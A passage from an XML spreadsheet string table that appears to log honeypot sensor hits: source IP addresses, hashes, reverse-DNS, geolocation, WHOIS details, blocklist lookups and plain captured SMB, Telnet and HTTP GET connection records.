    <t>['AUTHNS1.QWEST.NET', 'AUTHNS2.QWEST.NET']</t>
  </si>
  <si>
    <t>['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited https://icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited']</t>
  </si>
  <si>
    <t>domainabuse@cscglobal.com</t>
  </si>
  <si>
    <t>::ffff:4182:2c2d</t>
  </si>
  <si>
    <t>977a9661455339c6a7239f7a89061700</t>
  </si>
  <si>
    <t>111.242.222.54</t>
  </si>
  <si>
    <t>111-242-222-54.dynamic-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:6ff2:de36</t>
  </si>
  <si>
    <t>46dddf9ca8dbb890b5ca66d51ddd7335</t>
  </si>
  <si>
    <t>59.115.204.16</t>
  </si>
  <si>
    <t>::ffff:3b73:cc10</t>
  </si>
  <si>
    <t>6f2ae1c0800a8aab4d5f9d1e2975a45f</t>
  </si>
  <si>
    <t>61.3.30.142</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}</t>
  </si>
  <si>
    <t>::ffff:3d03:1e8e</t>
  </si>
  <si>
    <t>0d94880148e33f37209a0fc2c807a407</t>
  </si>
  <si>
    <t>114.26.93.48</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-26-93-48.dynamic-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_SMB_H10&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>{Data_SMB:Incoming connection (114.26.93.48,52945)}&amp;&amp;{Data_SMB:Incoming connection (114.26.93.48,52998)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (114.26.93.48,53954)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_TELNET:NA}</t>
  </si>
  <si>
    <t>::ffff:721a:5d30</t>
  </si>
  <si>
    <t>41273508fd2238c3982beec7bc60e328</t>
  </si>
  <si>
    <t>117.254.34.154</t>
  </si>
  <si>
    <t>{'b.barracudacentral.org': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'spamsources.fabel.dk': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown'&amp;&amp; 'exploits']}</t>
  </si>
  <si>
    <t>Cdma Project</t>
  </si>
  <si>
    <t>CDMA-BB</t>
  </si>
  <si>
    <t>::ffff:75fe:229a</t>
  </si>
  <si>
    <t>19033783a2e94b781f15b650e573f529</t>
  </si>
  <si>
    <t>60.246.82.129</t>
  </si>
  <si>
    <t>NA&amp;&amp;nz82l129.bb60246.ctm.net</t>
  </si>
  <si>
    <t>::ffff:3cf6:5281</t>
  </si>
  <si>
    <t>9765d58d32058b8685920c0ec1d0e7db</t>
  </si>
  <si>
    <t>117.192.136.155</t>
  </si>
  <si>
    <t>::ffff:75c0:889b</t>
  </si>
  <si>
    <t>34f24b2fc4e7bce2bd64f87730b2cbb0</t>
  </si>
  <si>
    <t>117.241.191.28</t>
  </si>
  <si>
    <t>::ffff:75f1:bf1c</t>
  </si>
  <si>
    <t>8a5d555099eafc79474b51e213fd5c0f</t>
  </si>
  <si>
    <t>59.95.133.240</t>
  </si>
  <si>
    <t>::ffff:3b5f:85f0</t>
  </si>
  <si>
    <t>85ebd305a71066e89ba38b23c505ad42</t>
  </si>
  <si>
    <t>61.1.128.230</t>
  </si>
  <si>
    <t>::ffff:3d01:80e6</t>
  </si>
  <si>
    <t>d4ea6d2cdb6da516e862e16829881e4d</t>
  </si>
  <si>
    <t>117.194.145.84</t>
  </si>
  <si>
    <t>::ffff:75c2:9154</t>
  </si>
  <si>
    <t>122732131c9d6b4b0a2b51ed245c095a</t>
  </si>
  <si>
    <t>117.195.37.147</t>
  </si>
  <si>
    <t>::ffff:75c3:2593</t>
  </si>
  <si>
    <t>4566dae40c8da95ebb09059ab028a341</t>
  </si>
  <si>
    <t>119.236.236.6</t>
  </si>
  <si>
    <t>n119236236006.netvigator.com</t>
  </si>
  <si>
    <t>::ffff:77ec:ec06</t>
  </si>
  <si>
    <t>8fa0a878a8b539be56812bf47f0251d8</t>
  </si>
  <si>
    <t>49.130.177.213</t>
  </si>
  <si>
    <t>::ffff:3182:b1d5</t>
  </si>
  <si>
    <t>7f7dc16377c0796b90a4fd0f98b80007</t>
  </si>
  <si>
    <t>123.231.190.210</t>
  </si>
  <si>
    <t>::ffff:7be7:bed2</t>
  </si>
  <si>
    <t>7cabf1e0115842796ff6185c2ec208fa</t>
  </si>
  <si>
    <t>213.209.150.150</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_HC1</t>
  </si>
  <si>
    <t>Swabia</t>
  </si>
  <si>
    <t>Augsburg</t>
  </si>
  <si>
    <t>2954172</t>
  </si>
  <si>
    <t>86161</t>
  </si>
  <si>
    <t>48.3459</t>
  </si>
  <si>
    <t>10.9161</t>
  </si>
  <si>
    <t>::ffff:d5d1:9696</t>
  </si>
  <si>
    <t>1333f96977c7db68ed7cac3524a475f3</t>
  </si>
  <si>
    <t>207.135.229.4</t>
  </si>
  <si>
    <t>31129&amp;&amp;23&amp;&amp;80</t>
  </si>
  <si>
    <t>Summit</t>
  </si>
  <si>
    <t>Kamas</t>
  </si>
  <si>
    <t>5776692</t>
  </si>
  <si>
    <t>84036</t>
  </si>
  <si>
    <t>40.645</t>
  </si>
  <si>
    <t>-111.282</t>
  </si>
  <si>
    <t>13614</t>
  </si>
  <si>
    <t>All West Communications, Inc.</t>
  </si>
  <si>
    <t>All West Communications</t>
  </si>
  <si>
    <t>2019-01-30</t>
  </si>
  <si>
    <t>ALLWEST-8</t>
  </si>
  <si>
    <t>2019-11-15</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Content-Length': '0', 'Host': '66.94.127.183:80', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:cf87:e504</t>
  </si>
  <si>
    <t>ca7e31a528ed933c5cb0d4657a8778d9</t>
  </si>
  <si>
    <t>114.35.151.95</t>
  </si>
  <si>
    <t>114-35-151-95.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H7</t>
  </si>
  <si>
    <t>23&amp;&amp;NA&amp;&amp;9100&amp;&amp;80&amp;&amp;34482</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:7223:975f</t>
  </si>
  <si>
    <t>6bd9eb0e82acdac763b34a43e287f3f1</t>
  </si>
  <si>
    <t>182.60.47.238</t>
  </si>
  <si>
    <t>::ffff:b63c:2fee</t>
  </si>
  <si>
    <t>a525f17316d0f8e969dadd6185e503c2</t>
  </si>
  <si>
    <t>220.135.2.149</t>
  </si>
  <si>
    <t>220-135-2-149.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H16</t>
  </si>
  <si>
    <t>23&amp;&amp;NA&amp;&amp;39723</t>
  </si>
  <si>
    <t>::ffff:dc87:295</t>
  </si>
  <si>
    <t>018dc83b85f1e8972b026876f1608911</t>
  </si>
  <si>
    <t>117.2.210.155</t>
  </si>
  <si>
    <t>::ffff:7502:d29b</t>
  </si>
  <si>
    <t>313e2705c2d55b118dff80bb1faba9f3</t>
  </si>
  <si>
    <t>46.121.76.83</t>
  </si>
  <si>
    <t>012 Smile</t>
  </si>
  <si>
    <t>012 Smile Communications LTD.</t>
  </si>
  <si>
    <t>::ffff:2e79:4c53</t>
  </si>
  <si>
    <t>09a15ee99ddf47c5f948cc160916bb83</t>
  </si>
  <si>
    <t>59.93.137.207</t>
  </si>
  <si>
    <t>::ffff:3b5d:89cf</t>
  </si>
  <si>
    <t>f675fbaf617a15057c157154920e0a47</t>
  </si>
  <si>
    <t>41.175.201.25</t>
  </si>
  <si>
    <t>ZW</t>
  </si>
  <si>
    <t>Zimbabwe</t>
  </si>
  <si>
    <t>Midlands Province</t>
  </si>
  <si>
    <t>Gweru</t>
  </si>
  <si>
    <t>890422</t>
  </si>
  <si>
    <t>-19.45</t>
  </si>
  <si>
    <t>29.8167</t>
  </si>
  <si>
    <t>37332</t>
  </si>
  <si>
    <t>ZOL</t>
  </si>
  <si>
    <t>Zimbabwe Online</t>
  </si>
  <si>
    <t>::ffff:29af:c919</t>
  </si>
  <si>
    <t>0b28b7b1445516cc87b82bf4fe2b2cf8</t>
  </si>
  <si>
    <t>146.70.132.204</t>
  </si>
  <si>
    <t>Blackpool</t>
  </si>
  <si>
    <t>Great Marton</t>
  </si>
  <si>
    <t>6694342</t>
  </si>
  <si>
    <t>53.8119</t>
  </si>
  <si>
    <t>-3.02261</t>
  </si>
  <si>
    <t>M247 Ltd Manchester</t>
  </si>
  <si>
    <t>::ffff:9246:84cc</t>
  </si>
  <si>
    <t>b7a4bfa5892c12d730514d1e0a640073</t>
  </si>
  <si>
    <t>77.3.134.2</t>
  </si>
  <si>
    <t>dynamic-077-003-134-002.77.3.pool.telefonica.de</t>
  </si>
  <si>
    <t>HH</t>
  </si>
  <si>
    <t>Hamburg</t>
  </si>
  <si>
    <t>2911298</t>
  </si>
  <si>
    <t>20454</t>
  </si>
  <si>
    <t>53.5488</t>
  </si>
  <si>
    <t>9.98717</t>
  </si>
  <si>
    <t>2023-12-20 09:32:58</t>
  </si>
  <si>
    <t>['ns1.telefonica.de 62.52.156.92', 'ns2.telefonica.de 213.191.76.196', 'ns3.telefonica.de 62.52.156.84']</t>
  </si>
  <si>
    <t>::ffff:4d03:8602</t>
  </si>
  <si>
    <t>03b74aa552985cec32fd193444367990</t>
  </si>
  <si>
    <t>117.197.130.4</t>
  </si>
  <si>
    <t>::ffff:75c5:8204</t>
  </si>
  <si>
    <t>07c76afa9aa39bf7f26445c514640aeb</t>
  </si>
  <si>
    <t>117.207.6.213</t>
  </si>
  <si>
    <t>::ffff:75cf:6d5</t>
  </si>
  <si>
    <t>1f55e3d74a2d39edf83ebed868b5c521</t>
  </si>
  <si>
    <t>61.3.1.31</t>
  </si>
  <si>
    <t>::ffff:3d03:11f</t>
  </si>
  <si>
    <t>3382e5fa446fd22454853b64d3820def</t>
  </si>
  <si>
    <t>167.60.10.224</t>
  </si>
  <si>
    <t>::ffff:a73c:ae0</t>
  </si>
  <si>
    <t>931b154a7c4cbcf00e3daa0500d53df1</t>
  </si>
  <si>
    <t>120.61.243.224</t>
  </si>
  <si>
    <t>::ffff:783d:f3e0</t>
  </si>
  <si>
    <t>5d7db2dc95efa7dce1b7d0899969796f</t>
  </si>
  <si>
    <t>5.178.236.121</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H28&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_DHCP_H19&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_MT-CPA_H24</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;34741&amp;&amp;67&amp;&amp;13956&amp;&amp;1433&amp;&amp;445&amp;&amp;59013&amp;&amp;58992</t>
  </si>
  <si>
    <t>Didi digomi</t>
  </si>
  <si>
    <t>41.7151</t>
  </si>
  <si>
    <t>44.8271</t>
  </si>
  <si>
    <t>MAGTI-BROADBAND</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:Incoming connection (5.178.236.121,58021)}&amp;&amp;{Data_SMB:Incoming connection (5.178.236.121,58579)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (5.178.236.121,51259)}&amp;&amp;{Data_SMB:Incoming connection (5.178.236.121,51717)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (5.178.236.121,52905)}&amp;&amp;{Data_SMB:Incoming connection (5.178.236.121,53697)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:5b2:ec79</t>
  </si>
  <si>
    <t>db6092e3b07a94d98f4936ee9a7a2529</t>
  </si>
  <si>
    <t>120.61.82.192</t>
  </si>
  <si>
    <t>::ffff:783d:52c0</t>
  </si>
  <si>
    <t>baa051a7d2202d8f0a3ae6f45459e8c3</t>
  </si>
  <si>
    <t>178.239.151.69</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>57859&amp;&amp;3306&amp;&amp;47127</t>
  </si>
  <si>
    <t>Tehrān (District 2)</t>
  </si>
  <si>
    <t>35.7863</t>
  </si>
  <si>
    <t>51.3811</t>
  </si>
  <si>
    <t>60631</t>
  </si>
  <si>
    <t>Pars Parva System LLC</t>
  </si>
  <si>
    <t>ParsParvaSystem</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}</t>
  </si>
  <si>
    <t>::ffff:b2ef:9745</t>
  </si>
  <si>
    <t>e8e7ac28c4bc071867e0003a4c32d992</t>
  </si>
  <si>
    <t>31.190.161.185</t>
  </si>
  <si>
    <t>1267</t>
  </si>
  <si>
    <t>RIPE Network Coordination Centre</t>
  </si>
  <si>
    <t>Network and company</t>
  </si>
  <si>
    <t>::ffff:1fbe:a1b9</t>
  </si>
  <si>
    <t>10a74b4c496a600e36db60d297fa5c23</t>
  </si>
  <si>
    <t>211.195.217.20</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H6</t>
  </si>
  <si>
    <t>40022&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>{'korea.services.net': ['unknown']&amp;&amp; 'spamsources.fabel.dk': ['unknown']}</t>
  </si>
  <si>
    <t>2000-05-26</t>
  </si>
  <si>
    <t>::ffff:d3c3:d914</t>
  </si>
  <si>
    <t>69b5397bc0d2ca394f8d1a40068699d4</t>
  </si>
  <si>
    <t>122.117.31.176</t>
  </si>
  <si>
    <t>122-117-31-176.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H16&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H18</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;NA&amp;&amp;24998</t>
  </si>
  <si>
    <t>::ffff:7a75:1fb0</t>
  </si>
  <si>
    <t>165425444b8c8537f58bbb7728d3023b</t>
  </si>
  <si>
    <t>125.24.199.32</t>
  </si>
  <si>
    <t>node-13c0.pool-125-24.dynamic.nt-isp.net</t>
  </si>
  <si>
    <t>Bang Khen</t>
  </si>
  <si>
    <t>1619506</t>
  </si>
  <si>
    <t>13.8774</t>
  </si>
  <si>
    <t>100.626</t>
  </si>
  <si>
    <t>::ffff:7d18:c720</t>
  </si>
  <si>
    <t>8d1882f7c809bee70de7966b4946b677</t>
  </si>
  <si>
    <t>217.35.71.255</t>
  </si>
  <si>
    <t>host217-35-71-255.in-addr.btopenworld.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>23&amp;&amp;9100&amp;&amp;80</t>
  </si>
  <si>
    <t>login&amp;&amp;connection&amp;&amp;GET</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>2000-03-20 19:04:30</t>
  </si>
  <si>
    <t>2026-03-20 18:04:30</t>
  </si>
  <si>
    <t>2025-03-05 10:08:38</t>
  </si>
  <si>
    <t>['DYDNS0.BT.COM', 'DYDNS1.BT.COM', 'EDDNS0.BT.COM', 'EDDNS1.BT.COM']</t>
  </si>
  <si>
    <t>::ffff:d923:47ff</t>
  </si>
  <si>
    <t>5a3f650d4a62753b3f356f0a80fbf0c0</t>
  </si>
  <si>
    <t>49.213.131.78</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H29</t>
  </si>
  <si>
    <t>2010-12-08</t>
  </si>
  <si>
    <t>TINP-NET</t>
  </si>
  <si>
    <t>::ffff:31d5:834e</t>
  </si>
  <si>
    <t>5c161381ec73bdd6172f68320dc270c7</t>
  </si>
  <si>
    <t>117.203.139.86</t>
  </si>
  <si>
    <t>::ffff:75cb:8b56</t>
  </si>
  <si>
    <t>d9195095f30c6b978ccc771e5cc01b8c</t>
  </si>
  <si>
    <t>168.0.147.143</t>
  </si>
  <si>
    <t>147-143.atualtektelecom.com.br</t>
  </si>
  <si>
    <t>Peabiru</t>
  </si>
  <si>
    <t>3454632</t>
  </si>
  <si>
    <t>-23.9128</t>
  </si>
  <si>
    <t>-52.3431</t>
  </si>
  <si>
    <t>52560</t>
  </si>
  <si>
    <t>AS52560</t>
  </si>
  <si>
    <t>ATK Telecomunicações Ltda.</t>
  </si>
  <si>
    <t>ATK Telecomunicações Ltda</t>
  </si>
  <si>
    <t>2013-03-21 00:00:00</t>
  </si>
  <si>
    <t>2028-03-21 00:00:00</t>
  </si>
  <si>
    <t>2025-02-11 00:00:00</t>
  </si>
  <si>
    <t>::ffff:a800:938f</t>
  </si>
  <si>
    <t>77efbd700ed131f1e44c2df02b83cb04</t>
  </si>
  <si>
    <t>222.103.95.195</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>31623&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:de67:5fc3</t>
  </si>
  <si>
    <t>ba53d99bf77698ec9bf5b01ac5b6482d</t>
  </si>
  <si>
    <t>59.98.196.167</t>
  </si>
  <si>
    <t>::ffff:3b62:c4a7</t>
  </si>
  <si>
    <t>48aea938bd7f90e38b3fcd1b4b4c2285</t>
  </si>
  <si>
    <t>117.208.229.120</t>
  </si>
  <si>
    <t>::ffff:75d0:e578</t>
  </si>
  <si>
    <t>ee63022d2462efe34a388c30fbbd5f8a</t>
  </si>
  <si>
    <t>117.202.139.176</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_SMB_H38</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}&amp;&amp;{Data_SMB:Incoming connection (117.202.139.176,58879)}</t>
  </si>
  <si>
    <t>::ffff:75ca:8bb0</t>
  </si>
  <si>
    <t>b3b2d1736da1d15731aea3a1462298ae</t>
  </si>
  <si>
    <t>89.177.131.240</t>
  </si>
  <si>
    <t>Praha 5</t>
  </si>
  <si>
    <t>Ořech (Praha 5)</t>
  </si>
  <si>
    <t>3068899</t>
  </si>
  <si>
    <t>155 00</t>
  </si>
  <si>
    <t>50.0468</t>
  </si>
  <si>
    <t>14.3047</t>
  </si>
  <si>
    <t>16019</t>
  </si>
  <si>
    <t>Vodafone Czech Republic a.s.</t>
  </si>
  <si>
    <t>Vodafone Czech Republic</t>
  </si>
  <si>
    <t>2006-03-16</t>
  </si>
  <si>
    <t>::ffff:59b1:83f0</t>
  </si>
  <si>
    <t>f1485c184b92ae957d8db4c637fefa23</t>
  </si>
  <si>
    <t>125.231.231.17</t>
  </si>
  <si>
    <t>125-231-231-17.dynamic-ip.hinet.net</t>
  </si>
  <si>
    <t>::ffff:7de7:e711</t>
  </si>
  <si>
    <t>fd0082702ac4d70b4ef86b0f94995ab4</t>
  </si>
  <si>
    <t>119.47.88.2</t>
  </si>
  <si>
    <t>SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_REDIS_HC1</t>
  </si>
  <si>
    <t>KB</t>
  </si>
  <si>
    <t>West Kalimantan</t>
  </si>
  <si>
    <t>Kota Pontianak</t>
  </si>
  <si>
    <t>Pontianak</t>
  </si>
  <si>
    <t>1630789</t>
  </si>
  <si>
    <t>-0.026330299999999997</t>
  </si>
  <si>
    <t>109.343</t>
  </si>
  <si>
    <t>38527</t>
  </si>
  <si>
    <t>JAWA POS NATIONAL NETWORK MEDIALINK, PT</t>
  </si>
  <si>
    <t>PT. JAWA POS NATIONAL NETWORK MEDIALINK</t>
  </si>
  <si>
    <t>::ffff:772f:5802</t>
  </si>
  <si>
    <t>f34e906ef2e5f3f0990214791a35ff60</t>
  </si>
  <si>
    <t>125.228.129.114</t>
  </si>
  <si>
    <t>125-228-129-114.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H41&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H37</t>
  </si>
  <si>
    <t>53&amp;&amp;280&amp;&amp;23&amp;&amp;NA&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de4:8172</t>
  </si>
  <si>
    <t>aaa0af8fa5e39f34c792cd40965f33a4</t>
  </si>
  <si>
    <t>5.58.13.208</t>
  </si>
  <si>
    <t>NA&amp;&amp;host-5-58-13-208.bitternet.ua</t>
  </si>
  <si>
    <t>Ternopil</t>
  </si>
  <si>
    <t>Ternopil Raion</t>
  </si>
  <si>
    <t>691650</t>
  </si>
  <si>
    <t>49.551</t>
  </si>
  <si>
    <t>25.5952</t>
  </si>
  <si>
    <t>16223</t>
  </si>
  <si>
    <t>MAXNET TELECOM, LTD</t>
  </si>
  <si>
    <t>2012-06-01</t>
  </si>
  <si>
    <t>::ffff:53a:dd0</t>
  </si>
  <si>
    <t>7edf17f6c47a2c3144fafa4ffe1c0475</t>
  </si>
  <si>
    <t>58.82.223.180</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H2</t>
  </si>
  <si>
    <t>2005-03-30</t>
  </si>
  <si>
    <t>::ffff:3a52:dfb4</t>
  </si>
  <si>
    <t>ed6b476b2bf3e1465dc625f8ecb5d807</t>
  </si>
  <si>
    <t>59.89.191.3</t>
  </si>
  <si>
    <t>::ffff:3b59:bf03</t>
  </si>
  <si>
    <t>d26d38dc222f5c3c98eaf900dc06e621</t>
  </si>
  <si>
    <t>54.36.148.231</t>
  </si>
  <si>
    <t>hydrogen231-ext2.ahrefs.net</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Brute Force</t>
  </si>
  <si>
    <t>Medium</t>
  </si>
  <si>
    <t>3.20157</t>
  </si>
  <si>
    <t>Ovh</t>
  </si>
  <si>
    <t>{HTTP_LOGIN:Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)}</t>
  </si>
  <si>
    <t>2012-03-20 08:05:47</t>
  </si>
  <si>
    <t>2030-03-20 08:05:47</t>
  </si>
  <si>
    <t>2024-05-20 07:51:02</t>
  </si>
  <si>
    <t>['ADAM.NS.CLOUDFLARE.COM', 'YOLANDA.NS.CLOUDFLARE.COM']</t>
  </si>
  <si>
    <t>Name.com, Inc.</t>
  </si>
  <si>
    <t>Redacted For Privacy</t>
  </si>
  <si>
    <t>abuse@name.com</t>
  </si>
  <si>
    <t>PO Box 1769</t>
  </si>
  <si>
    <t>::ffff:3624:94e7</t>
  </si>
  <si>
    <t>e1df5685f5caa5184d50bb0fb4de1fc1</t>
  </si>
  <si>
    <t>202.140.131.13</t>
  </si>
  <si>
